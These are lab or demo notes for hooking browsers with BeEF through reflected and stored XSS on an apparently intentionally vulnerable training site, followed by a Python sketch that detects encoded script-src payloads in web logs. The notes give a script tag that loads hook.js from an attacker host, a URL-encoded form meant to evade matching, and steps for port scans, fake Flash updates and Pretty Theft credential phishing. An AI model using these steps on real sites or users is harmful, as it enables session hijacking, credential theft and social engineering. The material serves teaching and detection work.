Used to exploit XSS and run a number of attacks against the user’s browser: cookie theft, credential theft, port scans, Metasploit modules, etc.
Browse to xss.cddexploit.net. The Reflected page puts parameters in the query string, so the payload can be dropped there. For the persisted variant, search for Gibbons and edit case 42; the payload can be dropped in the details field. Then use the Persisted page to view the case details.
Steps
Start BeEF on the attack host
Browse to your UI page from the VM (http://192.168.209.146:3000/ui/panel) and ensure the UI loads.
Drop the payload ( <script src="http://192.168.209.146:3000/hook.js"></script> ) into the Status box of the vulnerable page or paste it into the query string.
To obfuscate the attack a little, use Burp to turn the hook URL into a URL-encoded string for reflected attacks and paste it into the query string.
xss.cddexploit.net/Content/Vulnerable/Reflected.aspx?status=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%39%2e%31%34%36%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e%20
From the attack host, open the UI page (http://192.168.209.146:3000/ui/panel) and log in (beef/beef)
Open the command console, and show people around.
Run a port scan (Network, Port Scanner) against 192.168.209.146
Help the user perform a Google search (Misc, Google Search)
Run Fake Flash Update (Social Engineering, Fake Flash Update) updating the image to 192.168.209.146
Run Pretty Theft (Social Engineering, Pretty Theft) updating the image to 192.168.209.146
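For whoever reviews the web logs after the demo: the URL-encoding step above only hides the payload from literal string matching, so decode before you match. The sketch below is an added example, not part of the original notes; the function names, the decode-round limit and the app.example / cdn.example samples are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# <script ... src=...> pointing at an absolute or protocol-relative URL.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?\s*((?:https?:)?//[^\s\"'>]+)", re.I)
MAX_ROUNDS = 3  # assumption: enough to unwrap double or triple encoding

# The encoded request shown in the steps above (lab address from the page).
PAGE_URL = (
    "xss.cddexploit.net/Content/Vulnerable/Reflected.aspx?status="
    "%3c%73%63%72%69%70%74%20%73%72%63%3d%22"
    "%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%39%2e%31%34%36"
    "%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e%20")
# Constructed samples (not from the page): a double-encoded tag and a benign search.
_TAG = '<script src="//cdn.example/x.js"></script>'
DOUBLE_ENCODED = ("http://app.example/page?status="
                  + quote(quote(_TAG, safe=""), safe=""))
BENIGN = "http://app.example/search?q=script+src+tutorial"


def normalize(value: str) -> str:
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def external_script_params(url: str):
    """Return [(param, script_url)] for query parameters carrying a remote <script src>."""
    if "://" not in url:
        url = "http://" + url  # logged request lines often omit the scheme
    findings = []
    # parse_qsl decodes once; normalize() unwraps any further encoding layers.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        match = SCRIPT_SRC.search(normalize(value))
        if match:
            findings.append((name, match.group(1)))
    return findings


if __name__ == "__main__":
    for sample in (PAGE_URL, DOUBLE_ENCODED, BENIGN):
        print(external_script_params(sample))
```

This is a log-review aid only; the reflected and persisted pages still need to HTML-encode the status and details values on output.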